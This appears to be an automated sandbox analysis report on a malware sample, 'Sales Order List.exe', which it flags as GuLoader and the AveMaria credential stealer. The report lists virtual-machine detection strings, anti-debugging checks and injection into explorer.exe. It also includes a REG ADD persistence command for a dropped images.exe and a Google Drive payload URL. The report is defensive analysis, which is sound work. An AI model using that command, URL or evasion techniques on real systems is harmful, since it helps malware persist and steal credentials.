Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWu
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: WerFault.exe, 00000014.00000003.125951857336.0000000002E13000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllppsessionguid" val="00001060-0001-0011-c1a2-7ed0d8dfd701" />
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW-
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 0000000B.00000002.130418618344.0000000010A3B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW2
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Sales Order List.exe, explorer.exe, 0000000B.00000002.130418921281.0000000010A5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125980596864.0000000002E13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
Source: Amcache.hve.20.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3AA0 rdtsc 2_2_022F3AA0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2200 mov eax, dword ptr fs:[00000030h] 2_2_022F2200
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED2AB mov eax, dword ptr fs:[00000030h] 2_2_022ED2AB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 mov eax, dword ptr fs:[00000030h] 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED079 mov eax, dword ptr fs:[00000030h] 2_2_022ED079
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2DB4 mov eax, dword ptr fs:[00000030h] 2_2_022F2DB4
Source: C:\ProgramData\images.exe Code function: 15_2_02342200 mov eax, dword ptr fs:[00000030h] 15_2_02342200
Source: C:\ProgramData\images.exe Code function: 15_2_0233D2AD mov eax, dword ptr fs:[00000030h] 15_2_0233D2AD
Source: C:\ProgramData\images.exe Code function: 15_2_02344F00 mov eax, dword ptr fs:[00000030h] 15_2_02344F00
Source: C:\ProgramData\images.exe Code function: 15_2_02342DB4 mov eax, dword ptr fs:[00000030h] 15_2_02342DB4
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Sales Order List.exe Process queried: DebugPort
Source: C:\ProgramData\images.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EEE64 LdrInitializeThunk, 2_2_022EEE64
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6B37 RtlAddVectoredExceptionHandler, 2_2_022F6B37
Source: C:\ProgramData\images.exe Code function: 15_2_02346B37 RtlAddVectoredExceptionHandler, 15_2_02346B37

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: C:\Windows\explorer.exe base: 33370000
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: C:\Windows\explorer.exe base: EA70000
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Sales Order List.exe Memory allocated: C:\Windows\explorer.exe base: EA70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Sales Order List.exe Memory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: PID: 4576 base: 33370000 value: 58
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: PID: 4576 base: EA70000 value: E8
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: explorer.exe, 0000000B.00000000.125828329284.0000000004ECA000.00000004.00000001.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.130379665541.00000000008E9000.00000004.00000020.sdmp Binary or memory string: 1Progman
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: 5Program ManagerJ
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connections per server for Internet Explorer
Source: C:\Users\user\Desktop\Sales Order List.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.20.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Credential Stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY